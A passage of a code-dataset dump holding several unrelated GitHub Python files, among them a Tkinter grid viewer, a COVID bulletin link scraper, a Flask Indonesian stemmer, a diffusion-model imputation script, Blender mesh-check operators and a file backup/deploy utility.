app.run_server()","repo_name":"JPcalkins213/plotly_notes","sub_path":"dash_notes/hoverData_comp.py","file_name":"hoverData_comp.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8914893158","text":"import tkinter as tk\nfrom tkinter import *\n\n\nclass Application(tk.Tk):\n def __init__(self, grid):\n self.grid = grid\n self.d ={}\n tk.Tk.__init__(self)\n self.width = self.winfo_screenwidth()\n self.height = self.winfo_screenheight()\n self.configure(background='black')\n self.create_grid()\n\n\n def create_grid(self):\n for i in range (self.grid.width ):\n for j in range (self.grid.height ):\n self.d[\"label{0}{1}\".format(i,j)] = Label(self, bg ='white')\n self.d[\"label{0}{1}\".format(i, j)].grid(row=i, column=j,ipadx =(self.width / self.grid.height)/4 , ipady = self.height / (self.grid.width * 4), padx = '1',pady='1')\n if self.grid.grid[i][j] == \"[X]\":\n self.d[\"label{0}{1}\".format(i, j)].configure(bg=\"red\")\n\n\n def update_grid(self,column,size,h):\n for i in range(self.grid.width):\n for j in range(self.grid.height):\n if self.grid.grid[ i ][ j ] == \"[X]\":\n self.d[ \"label{0}{1}\".format(i, j) ].configure(bg=\"red\")\n for i in range(h):\n self.d[ \"label{0}{1}\".format(self.grid.width - size + i , column) ].configure(bg='yellow')\n\n\n\n def show_grid(self):\n for i in range(self.grid.width):\n for j in range(self.grid.height):\n if self.grid.grid[ i ][ j ] == \"[X]\":\n self.d[ \"label{0}{1}\".format(i, j) ].configure(bg=\"red\")\n\n\n\n\n\n\n\n\n","repo_name":"Zelwa/ModelisationAlgoLLL","sub_path":"modelisation/Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6418686229","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: LgOliveira\r\n\"\"\"\r\nimport re\r\nimport requests\r\nfrom pathlib import Path\r\n\r\nimport locale\r\nlocale.setlocale(locale.LC_TIME, \"pt_PT.UTF-8\")\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n url = 'https://covid19.min-saude.pt/'\r\n\r\n response = requests.get(\r\n url=url,\r\n headers={\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Language': 'pt-PT,pt;q=0.9',\r\n 'Accept-Encoding': 'br',\r\n },\r\n )\r\n if response.status_code != 200:\r\n raise ValueError('Unable to retrieve data from covid site. 
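In the Dash record above, encode_image reads the file with open(...).read() and never closes the handle. A sketch of the same data-URI helper with a context manager; html.Img accepts a base64 "data:image/png;base64,..." string as src, so no static file route is needed:

import base64

def encode_image(image_file):
    with open(image_file, 'rb') as f:            # handle is closed on exit
        encoded = base64.b64encode(f.read())
    return f'data:image/png;base64,{encoded.decode()}'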
Error %s: $s' % response.status_code, response.text)\r\n\r\n # Ponto de Situação (31-01-2022)\r\n matches = re.search((\r\n r'(https://covid19.min-saude.pt/wp-content/uploads/[0-9]+/[0-9]+/([0-9]+_DGS_boletim_([0-9]+)\\.pdf))'\r\n ), response.text, re.MULTILINE | re.IGNORECASE)\r\n\r\n if not matches:\r\n print(response.text)\r\n raise(\"Link not found\")\r\n link = matches.group(1)\r\n\r\n path = Path(__file__).resolve().parents[1]\r\n file=path / 'report_link.txt'\r\n with open(file,'r') as f:\r\n old_link = f.readline()\r\n\r\n if old_link != link:\r\n with open(file,'w') as f:\r\n f.write(link)\r\n print(f\"UPDATED latest={old_link} link={link}\")\r\n","repo_name":"dssg-pt/covid19pt-data","sub_path":".github/workflows/disabled/Web_Scrapper_DGS.py","file_name":"Web_Scrapper_DGS.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":447,"dataset":"github-code","pt":"72"} +{"seq_id":"41008027110","text":"import os\nimport app\nimport json\nfrom flaskext.mysql import MySQL\nfrom flask import Blueprint, render_template, request, make_response\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nviews = Blueprint(\"views\", __name__)\nvowels = ['a', 'i', 'u', 'e', 'o']\n\ndef checkDict(word):\n conn = app.mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"\"\"SELECT * FROM tb_katadasar WHERE katadasar = %s\"\"\", (word,))\n data = cursor.fetchone()\n conn.close()\n return data\n\ndef rreplace(s, old, new, occurrence):\n li = s.rsplit(old, occurrence)\n return new.join(li)\n\ndef checkParticle1(word):\n particle1 = ['kah', 'lah', 'pun']\n for p in particle1:\n if word.endswith(p):\n word = rreplace(word, p, '', 1)\n return word\n return word\n\ndef checkParticle2(word):\n particle2 = ['ku', 'mu', 'nya']\n for p in particle2:\n if word.endswith(p):\n word = rreplace(word, p, '', 1)\n return word\n return word\n\ndef checkParticle3(word):\n particle3V1 = ['meny', 'peny']\n for p in particle3V1:\n if word.startswith(p) and word[4] in vowels:\n word = word.replace(p, 's', 1)\n return word\n\n particle3V2 = ['mem', 'pem']\n for p in particle3V2:\n if word.startswith(p) and word[4] in vowels:\n word = word.replace(p, 'p', 1)\n return word\n\n particle3 = ['meng', 'men', 'mem', 'me', 'peng', 'pen', 'pem', 'di', 'ter', 'ke']\n for p in particle3:\n if word.startswith(p):\n word = word.replace(p, '', 1)\n return word\n\n return word\n\ndef checkParticle4(word):\n particle4V1 = ['bel', 'pel']\n for p in particle4V1:\n if word.startswith(p) and word.endswith('ajar'):\n word = word.replace(p, '', 1)\n return word\n\n if word.startswith('be') and word[2] == 'k' and f'{word[3]}{word[4]}' == 'er':\n word = word.replace('be', '', 1)\n return word\n\n particle4 = ['ber', 'per', 'pe']\n for p in particle4:\n if word.startswith(p):\n word = word.replace(p, '', 1)\n return word\n\n return word\n\ndef checkParticle5(word, wordOriginal):\n if word.endswith('kan') and not wordOriginal.startswith(('ke', 'peng')):\n word = rreplace(word, 'kan', '', 1)\n return word\n\n if word.endswith('an') and not wordOriginal.startswith(('di', 'meng', 'ter')):\n word = rreplace(word, 'an', '', 1)\n return word\n\n if word.endswith('i') and not wordOriginal.startswith(('ber', 'ke', 'peng')):\n word = rreplace(word, 'i', '', 1)\n return word\n\n return word\n\n@views.route(\"/\", methods = ['GET', 'POST'])\ndef home():\n if (request.method == \"GET\"):\n return render_template(\"home.html\")\n else:\n doc = request.form['document']\n\n #1 - Cleaning\n doc1 = 
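Note on the Web_Scrapper_DGS.py record above: the ValueError message uses '$s' where '%s' was intended, and response.text ends up as a second exception argument instead of being interpolated into the message. A corrected sketch with stand-in values:

status_code, text = 503, "Service Unavailable"   # stand-ins for the response fields
msg = 'Unable to retrieve data from covid site. Error %s: %s' % (status_code, text)
raise ValueError(msg)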
request.form['document']\n for ch in ['\\\\','`','*','_','{','}','[',']','(',')','>','#','+','-','.','!','$','\\'',',']:\n if ch in doc1:\n doc1 = doc1.replace(ch, \" \")\n doc1 = ''.join([i for i in doc1 if not i.isdigit()])\n\n #2 - Case Folding\n doc2 = doc1.lower()\n\n #3 - Tokenization\n doc3 = doc2.split()\n\n #4 - Filtering\n data_file = os.path.join(basedir, 'static/datas/stopwords.txt')\n stopwords = []\n with open(data_file, \"r\") as file:\n for line in file.readlines():\n stopwords.append(line.rstrip())\n doc4 = doc2.split()\n for word in doc4:\n if word in stopwords:\n doc4.remove(word)\n doc4 = ' '.join(doc4)\n\n #5 - Stemming\n doc5 = []\n for idx, word in enumerate(doc4.split()):\n doc5Part = {}\n doc5Part['data'] = ''\n doc5Part['steps'] = []\n\n wordOriginal = word\n #5.1 - Hapus partikel\n wordBefore = word\n word = checkParticle1(word)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n #5.2 - Hapus akhiran kepemilikan\n wordBefore = word\n word = checkParticle2(word)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n #5.3 - Hapus awalan ke-1\n wordBefore = word\n word = checkParticle3(word)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n #5.4 - Hapus awalan ke-2\n wordBefore = word\n word = checkParticle4(word)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n #5.5 - Hapus akhiran\n wordBefore = word\n word = checkParticle5(word, wordOriginal)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n doc5.append(doc5Part)\n\n\n return render_template(\"home.html\", doc=doc, doc1=doc1, doc2=doc2, doc3=doc3, doc4=doc4, doc5=doc5, doc5Part=json.dumps(doc5Part))","repo_name":"YanuarWanda/stemming-kamus","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43212874663","text":"from sys import stdin\n\nstd = stdin.readline\n\nN = int(std())\nnum = []\nfor i in range(N):\n a = int(std())\n num.append((a, abs(a)))\n\nnum = sorted(num, key=lambda x: -x[1])\nanswer = 0\n\nwhile num:\n ans = num[0][0]\n index = -1\n for i in range(1, len(num)):\n if ans > 0:\n if num[i][0] > 1:\n index = i\n ans *= num[i][0]\n break\n else:\n if num[i][0] <= 
0:\n index = i\n ans *= num[i][0]\n break\n answer += ans\n if not index == -1:\n num.pop(index)\n num.pop(0)\n\nprint(answer)\n","repo_name":"KIMJINOH97/Algorithm","sub_path":"python/BOJ/Greedy/1744.py","file_name":"1744.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72357932713","text":"import torch\nfrom transformers import BertModel,BertTokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nsentences=[\"i guess we don't need\",\"excuse me\"]\ninputs = tokenizer(sentences, padding=True, return_tensors='pt')\n#print(inputs)\nmodel = BertModel.from_pretrained('bert-base-uncased')\noutputs = model(**inputs)\nfeatures = outputs[0][:, 0, :].detach().numpy()\nprint(outputs[0].shape)\nprint(outputs[0][:, 0, :].shape)\nprint(\"features\",features.shape)\n\ninput_ids = tokenizer([\"i guess we don't need\"], return_tensors='pt') # Batch size 1\ninput_ids2 = torch.tensor(tokenizer.encode(\"i guess we don't need\", add_special_tokens=True))\ninput_ids3=tokenizer.encode(\"i guess we don't need\", add_special_tokens=True)\nprint(input_ids,input_ids[\"token_type_ids\"],input_ids2,input_ids3)\n\nmodel = BertModel.from_pretrained('bert-base-uncased')\n\noutputs = model(**input_ids)\n#encoded_layers, _ = model(input_ids2)\n#print(\"try\",encoded_layers)\n\nprint(model)\nlast_hidden_states = outputs.last_hidden_state\nprint('last_hidden_states:' ,last_hidden_states.shape)\npooler_output = outputs.pooler_output\nprint('---pooler_output: ', pooler_output.shape)\n'''\nfrom my_model2 import tsc\n\n\nmodel=tsc()\ninput=torch.rand([300,156])\nout=model.semantic_cnn1(input)\nout=model.semantic_cnn2(out)\nout=model.semantic_cnn3(out)\nprint(out.shape)\n\naudio_input=torch.randn(500,16,40)\nh_0 = torch.randn(1,16,768)\nc_0 = torch.randn(1, 16,768)\naudio_out=model.acoustic_lstm(audio_input)\nprint(audio_out[0].shape)\n\n'''\nfrom torch.utils.tensorboard import SummaryWriter\n\nwriter = SummaryWriter('logs')\nx = range(100)\nfor i in x:\n writer.add_scalar('y=x+10', i, i+10)\nwriter.close()\n","repo_name":"xiaoheng-zhang99/fine_grained","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40097914027","text":"import argparse\nimport torch\nimport datetime\nimport json\nimport yaml\nimport os\nfrom pypots.imputation import SAITS\nimport pickle\nimport numpy as np\nimport time\nnp.set_printoptions(threshold=np.inf)\nfrom models.mask_main_model import Mask_PM25\nfrom datasets.dataset_pm25_mask import get_dataloader\nfrom utils.utils import train, clip_pattern_mask\n\ndef quantile_loss(target, forecast, q: float) -> float:\n return 2 * torch.sum(\n torch.abs((forecast - target) * ((target <= forecast) * 1.0 - q))\n )\n\n\ndef calc_denominator(target):\n return torch.sum(torch.abs(target))\n\n\ndef calc_quantile_CRPS(target, forecast, mean_scaler, scaler):\n # print(f\"target: {target.shape}\\nforecast: {forecast.shape}\")\n target = target * scaler + mean_scaler\n forecast = forecast * scaler + mean_scaler\n\n # print(f\"target: {target}\")\n # print(f\"forecasts: {forecast[0:10]}\")\n\n quantiles = np.arange(0.05, 1.0, 0.05)\n denom = calc_denominator(target)\n CRPS = 0\n for i in range(len(quantiles)):\n q_pred = []\n for j in range(len(forecast)):\n q_pred.append(torch.quantile(forecast[j : j + 1], quantiles[i], dim=1))\n q_pred = torch.cat(q_pred, 
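For the transformers test script above, the two pooled tensors it prints differ in a specific way: last_hidden_state[:, 0, :] is the raw [CLS] hidden state, while pooler_output is that same state passed through BERT's trained dense+tanh pooler head; they are related but not interchangeable. A condensed sketch:

import torch
from transformers import BertModel, BertTokenizer

tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertModel.from_pretrained('bert-base-uncased')
inputs = tokenizer(["excuse me"], return_tensors='pt')
with torch.no_grad():
    outputs = model(**inputs)
cls_state = outputs.last_hidden_state[:, 0, :]   # raw [CLS] state, shape (1, 768)
pooled = outputs.pooler_output                   # dense + tanh over [CLS], shape (1, 768)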
0)\n q_loss = quantile_loss(target, q_pred, quantiles[i])\n # print(f\"q_loss: {q_loss}, denom: {denom}\")\n CRPS += q_loss / denom\n # print(f\"CRPS each qunatile: {CRPS}\")\n return CRPS.item() / len(quantiles)\n\nd_time = 36\nargs = {\n 'train': {\n 'epochs': 300,\n 'batch_size': 16,\n 'lr': 1.0e-3\n }, \n 'diffusion': {\n 'layers': 4, \n 'channels': 64,\n 'nheads': 8,\n 'diffusion_embedding_dim': 128,\n 'beta_start': 0.0001,\n 'beta_end': 0.5,\n 'num_steps': 50,\n 'schedule': \"quad\",\n 'is_fast': False,\n },\n 'model': {\n 'is_unconditional': True,\n 'timeemb': 128,\n 'featureemb': 16,\n 'target_strategy': \"mix\",\n 'type': 'CSDI',\n 'n_layers': 3, \n 'd_time': d_time,\n 'n_feature': 36,#len(attributes),\n 'd_model': 128,\n 'd_inner': 128,\n 'n_head': 8,\n 'd_k': 64,\n 'd_v': 64,\n 'dropout': 0.1,\n 'diagonal_attention_mask': True,\n \"test_missing_ratio\": 0.1\n }\n}\n\nprint(f\"config: {args}\")\nargs['validationindex'] = 0\nargs['device'] = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ntrain_loader, valid_loader, test_loader, std, mean = get_dataloader(\n args[\"train\"][\"batch_size\"], device=args['device'], validindex=args['validationindex']\n)\nargs['model']['type'] = 'CSDI'\nargs['diffusion']['is_fast'] = False\nargs['device'] = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nmodel_csdi = Mask_PM25(args, args['device']).to(args['device'])\nmodel_folder = \"saved_model_pm25_mask\"\nfilename = \"model_csdi_pm25_mask.pth\"\nif not os.path.isdir(model_folder):\n os.makedirs(model_folder)\ntrain(\n model_csdi,\n args[\"train\"],\n train_loader,\n valid_loader=valid_loader,\n foldername=model_folder,\n filename=filename\n)\n\n# model_csdi.load_state_dict(torch.load(f\"{model_folder}/{filename}\"))\n\nnsample = 30000 # 3000 * 4 * 8\nground = 0\nfor i, val in enumerate(test_loader):\n ground = val['observed_mask'].to(args[\"device\"]).float() # (B, L, K)\n\nsample_folder = './data/pm25/miss_patterns'\n\nif not os.path.isdir(sample_folder):\n os.makedirs(sample_folder)\n# L = 48, K = 35\nwith torch.no_grad():\n output = model_csdi.evaluate(nsample, shape=(1, 36, 36))\n samples = output\n samples = samples.permute(0, 1, 3, 2) # (B,nsample,L,K)\n\n # print(f\"sample 1: {samples[0][0].cpu().numpy()}\")\n # print(f\"sample 1: {samples[0][2].cpu().numpy()}\")\n # print(f\"sample 1: {samples[0][3].cpu().numpy()}\")\n save_samples = clip_pattern_mask(samples.cpu().numpy())\n save_samples = save_samples.squeeze(0)\n # print(f\"sample 1: {save_samples[0].cpu().numpy()}\")\n # print(f\"sample 1: {save_samples[2].cpu().numpy()}\")\n # print(f\"sample 1: {save_samples[3].cpu().numpy()}\")\n for i in range(save_samples.shape[0]):\n np.save(f\"{sample_folder}/pattern_{i}.npy\", save_samples[i])\n\n crps_avg = 0\n num = 0\n for i in range(len(ground)):\n crps = calc_quantile_CRPS(ground[i].unsqueeze(0), samples, 0, 1)\n print(f\"CRPS for {i} : {crps}\")\n crps_avg += crps\n num += 1\n print(f\"final CRPS: {crps_avg / num}\")","repo_name":"rafid009/Time-series-imputation","sub_path":"exe_pm25_mask.py","file_name":"exe_pm25_mask.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32784479218","text":"puzzle_input = open(\"Day 6/puzzleinput.txt\").read().splitlines()\n\ngroups = []\ntemp_group = []\n\nfor response in puzzle_input:\n if response != '':\n temp_group.append(response)\n else: \n groups.append(temp_group)\n temp_group = []\n\nprint(groups[0])\n\ncount = 
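A tiny numeric check of the pinball loss that calc_quantile_CRPS in exe_pm25_mask.py averages over quantiles 0.05-0.95; at q = 0.5 the expression reduces to a plain L1 distance:

import torch

def quantile_loss(target, forecast, q):
    return 2 * torch.sum(torch.abs((forecast - target) * ((target <= forecast) * 1.0 - q)))

target = torch.tensor([1.0, 2.0, 3.0])
forecast = torch.tensor([1.5, 1.5, 3.5])
print(quantile_loss(target, forecast, 0.5))   # tensor(1.5000) == sum of |errors|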
0\n\nfor group in groups:\n group_yes = []\n for line in group:\n person_yes = [char for char in \"abcdefghijklmnopqrstuvwxyz\" if char in line]\n group_yes += [char for char in person_yes if char not in group_yes]\n count += len(group_yes)\n\nprint(group)\nprint(person_yes)\nprint(group_yes)\nprint(count)\n","repo_name":"Dwittyy/AdventOfCode","sub_path":"2020/Day 6/Day 6a.py","file_name":"Day 6a.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26936074810","text":"import bpy\nimport bmesh\n\n\nclass OBJECT_OT_FindNoSGfaces(bpy.types.Operator):\n bl_idname = \"object.find_no_sg_faces\"\n bl_label = \"Check Smoothing groups\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n original_mode = bpy.context.object.mode\n bpy.ops.object.mode_set(mode=\"OBJECT\")\n\n obj = context.active_object\n mesh = obj.data\n\n if not obj or obj.type != \"MESH\":\n self.report({\"WARNING\"}, \"Active object is not a mesh\")\n return {\"CANCELLED\"}\n\n if \"SG\" in mesh.attributes:\n attr = mesh.attributes[\"SG\"].data\n no_sg_faces = [index for index, face in enumerate(attr) if face.value == 0]\n\n obj[\"no_sg_faces\"] = no_sg_faces\n\n if original_mode == \"EDIT\":\n bpy.ops.object.mode_set(mode=\"EDIT\")\n bpy.ops.object.select_no_sg_faces()\n\n return {\"FINISHED\"}\n\n\nclass OBJECT_OT_SelectNoSGfaces(bpy.types.Operator):\n bl_idname = \"object.select_no_sg_faces\"\n bl_label = \"Select Faces with No Smooth Group\"\n\n def execute(self, context):\n obj = context.active_object\n\n if not obj or obj.type != \"MESH\" or \"no_sg_faces\" not in obj:\n self.report(\n {\"WARNING\"}, \"No faces to select or active object is not a mesh\"\n )\n return {\"CANCELLED\"}\n\n bpy.ops.object.mode_set(mode=\"EDIT\")\n\n mesh = bmesh.from_edit_mesh(obj.data)\n mesh.faces.ensure_lookup_table()\n\n for index in obj[\"no_sg_faces\"]:\n if index < len(mesh.faces):\n mesh.faces[index].select_set(True)\n\n bmesh.update_edit_mesh(obj.data)\n return {\"FINISHED\"}\n\n\nclass OBJECT_OT_FindLooseVertsEdges(bpy.types.Operator):\n bl_idname = \"object.find_loose_verts_edges\"\n bl_label = \"Find Loose Vertices and Edges\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n obj = context.active_object\n\n if not obj or obj.type != \"MESH\":\n self.report({\"WARNING\"}, \"Active object is not a mesh\")\n return {\"CANCELLED\"}\n\n bpy.ops.object.mode_set(mode=\"OBJECT\")\n\n mesh = bmesh.new()\n mesh.from_mesh(obj.data)\n\n # Finding loose vertices and edges\n loose_verts = [v.index for v in mesh.verts if not v.link_edges]\n loose_edges = [e.index for e in mesh.edges if not e.link_faces]\n\n # Storing the results in the object\n obj[\"loose_verts\"] = loose_verts\n obj[\"loose_edges\"] = loose_edges\n\n mesh.free()\n return {\"FINISHED\"}\n\n\nclass OBJECT_OT_SelectLooseVertsEdges(bpy.types.Operator):\n bl_idname = \"object.select_loose_verts_edges\"\n bl_label = \"Select Loose Vertices and Edges\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n obj = context.active_object\n\n if not obj or obj.type != \"MESH\" or \"loose_verts\" not in obj or \"loose_edges\" not in obj:\n self.report({\"WARNING\"}, \"No elements to select or active object is not a mesh\")\n return {\"CANCELLED\"}\n\n bpy.ops.object.mode_set(mode=\"EDIT\")\n\n bm = bmesh.from_edit_mesh(obj.data)\n bm.verts.ensure_lookup_table()\n bm.edges.ensure_lookup_table()\n\n # Select loose vertices\n for 
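The per-group union in the Advent of Code day 6 record above can be expressed directly with sets; a sketch over a toy groups list:

groups = [["abc", "bcd"], ["xy"]]   # stand-in for the parsed input
count = sum(len(set("".join(group))) for group in groups)
print(count)                        # {a,b,c,d} -> 4, {x,y} -> 2, total 6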
v_index in obj[\"loose_verts\"]:\n if v_index < len(bm.verts):\n bm.verts[v_index].select_set(True)\n\n # Select loose edges\n for e_index in obj[\"loose_edges\"]:\n if e_index < len(bm.edges):\n bm.edges[e_index].select_set(True)\n\n bmesh.update_edit_mesh(obj.data)\n return {\"FINISHED\"}\n\n\n\nclasses = (\n OBJECT_OT_FindNoSGfaces,\n OBJECT_OT_SelectNoSGfaces,\n OBJECT_OT_SelectLooseVertsEdges,\n OBJECT_OT_FindLooseVertsEdges,\n)\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"deve0ne/TimofeyToolbox","sub_path":"mesh_check.py","file_name":"mesh_check.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5147776897","text":"import zipfile\nimport shutil\nimport os\nimport uuid\nimport re\nimport pwd\nimport grp\nimport json\nimport os.path as path\nfrom logger import logger\nimport subprocess\n\ndef zip_files(zip_file_name, saved_dir, files_to_zip):\n logger.info(\"zip files as [{}] to [{}]\".format(zip_file_name, saved_dir))\n with zipfile.ZipFile(os.path.join(saved_dir, zip_file_name), 'x') as zipMe:\n for file in files_to_zip:\n logger.info(\"adding file [{}]\".format(file))\n zipMe.write(file, path.basename(file),\n compress_type=zipfile.ZIP_DEFLATED)\n logger.info(\"zip files finished.\")\n\ndef unzip_file(tmp_dir_to_unzip, zip_file):\n logger.info(\"Unzipping file [{}] to [{}]\".format(zip_file, tmp_dir_to_unzip)) \n with zipfile.ZipFile(zip_file, 'r') as zipFile:\n zipFile.extractall(tmp_dir_to_unzip)\n logger.info(\"unzip finished.\")\n\n\ndef backup_file(change, settings):\n logger.info(\"getting files to backup\") \n files_to_backup = [sanitize_path(x['dst'])\n for x in change['files_to_update'] if os.path.isfile(sanitize_path(x['dst']))] \n conf_dir = os.path.join(\"/tmp\", str(uuid.uuid4())) \n os.mkdir(conf_dir)\n logger.info(\"made tmp folder to copy files: [{}]\".format(conf_dir))\n file_list = []\n for file in change['files_to_update']:\n obj = {}\n path = sanitize_path(file['dst'])\n if os.path.isfile(path):\n st = os.stat(path)\n obj['permission'] = oct(st.st_mode)[-3:]\n obj['user'] = pwd.getpwuid(st.st_uid)[0]\n obj['group'] = grp.getgrgid(st.st_gid)[0]\n obj['src'] = os.path.basename(path)\n file_list.append(obj)\n shutil.copy(path, conf_dir)\n conf_file = os.path.join(conf_dir, \"package-info.json\")\n with open(conf_file, 'w+') as f:\n json.dump(file_list, f, indent=4,\n separators=(',', ': '), sort_keys=True)\n logger.info(\"Write package-info.json file as:\")\n logger.info(json.dumps(file_list, indent=4,\n separators=(',', ': '), sort_keys=True))\n files_to_backup.append(conf_file)\n zip_files(change['change_id']+'.zip',\n sanitize_path(settings['backup_dir']), files_to_backup)\n for file in change['files_to_update']:\n if os.path.isfile(path):\n os.remove(sanitize_path(file['dst']))\n return conf_dir\n\n\ndef sanitize_path(path):\n result = re.findall(r'(\\$\\{?(\\w+)\\}?)', path)\n for group in result:\n if group[1] in os.environ:\n path = path.replace(group[0], os.environ[group[1]])\n return path\n\n\ndef do_single_file_move(base_dir, file, origin_tmp_dir):\n dest_file = sanitize_path(file['dst'])\n if file['src'] == '':\n # it is done in backup files.\n logger.info(\"removing [{}]\".format(file['dst']))\n os.remove(dest_file)\n else:\n if 'is_config' in file and file['is_config'] == True:\n 
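Note on utils.py above: zip_files opens the archive in mode 'x' (exclusive create), so re-running a backup against an existing zip raises FileExistsError. A hypothetical overwriting variant, not from the original repo:

import os
import zipfile

def zip_files_overwrite(zip_path, files_to_zip):
    with zipfile.ZipFile(zip_path, 'w') as zf:   # 'w' truncates an existing archive
        for f in files_to_zip:
            zf.write(f, os.path.basename(f), compress_type=zipfile.ZIP_DEFLATED)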
logger.info(\"performing config file change...\")\n delimeter = file['delimeter']\n config = {}\n with open(path.join(base_dir, file['src']), 'r') as f:\n content = f.readlines()\n config = {line.split(delimeter)[0].strip(): {\"value\":delimeter.join(\n line.split(delimeter)[1:]), \"installed\":False} for line in content}\n file_name = os.path.basename(dest_file)\n with open(path.join(origin_tmp_dir, file_name), 'r') as f:\n content = f.readlines()\n with open(dest_file, 'w+') as f:\n logger.info(\"opening file to write: [{}]\".format(dest_file))\n for line in content:\n key, value = line.split(delimeter)[0], delimeter.join(\n line.split(delimeter)[1:])\n print(\"key:value-> [{}]:[{}]\".format(key,value))\n if key.strip() in config:\n f.write(\"{}{}{}\\n\".format(key, delimeter, config[key]['value']))\n config[key]['installed']=True\n else:\n f.write(\"{}\".format(line))\n for key, value in config.items():\n if value['installed'] == False:\n logger.info(\"appending: {}{}{}\\n\".format(key, delimeter, value['value']))\n f.write(\"{}{}{}\\n\".format(key, delimeter, value['value']))\n logger.info(\"config file change done.\")\n else:\n shutil.copy(os.path.join(base_dir, file['src']), dest_file)\n os.chmod(dest_file, int(file['permission'], 8))\n uid = pwd.getpwnam(file['user']).pw_uid\n gid = grp.getgrnam(file['group']).gr_gid\n os.chown(dest_file, uid, gid)\n\n\ndef download_file(dir_to_down, settings, change):\n logger.info(\"downloading file [{}]...\".format(change['package_name']))\n if os.path.isdir(dir_to_down):\n shutil.rmtree(dir_to_down)\n os.mkdir(dir_to_down)\n\n shutil.copy(path.join(sanitize_path(\n settings['zip_dir']), change['package_name']), dir_to_down)\n logger.info(\"file downloaded to [{}]\".format(dir_to_down))\n\ndef do_test(change, settings):\n setting = [s['test_script'] for s in settings['test'] if s['application']]\n try:\n test_file = sanitize_path(setting[0])\n logger.info(\"runing test file: [{}]\".format(test_file))\n sp = subprocess.run([\n \"python\", test_file], check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) \n sp.check_returncode()\n logger.info(sp.stdout)\n logger.info(sp.stderr)\n except subprocess.CalledProcessError as e:\n logger.error(e)\n return False\n return True\n\ndef get_change_id(change, settings):\n logger.info(\"getting change id...\")\n change_id = '{}-{}'.format(change['action'], change['update_id'])\n file_list = os.listdir(sanitize_path(settings['backup_dir']))\n same_name = [ f for f in file_list if change_id in f]\n if len(same_name)>0:\n change_id = change_id + \"-\" + str(len(same_name))\n logger.info(\"change id is [{}]\".format(change_id))\n return change_id\n","repo_name":"X20435668/cs5331_project","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28910039845","text":"\"\"\"\nTest the results of stratifying a model.\n\"\"\"\nimport pytest\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\n\nfrom summer_py.summer_model import StratifiedModel\nfrom 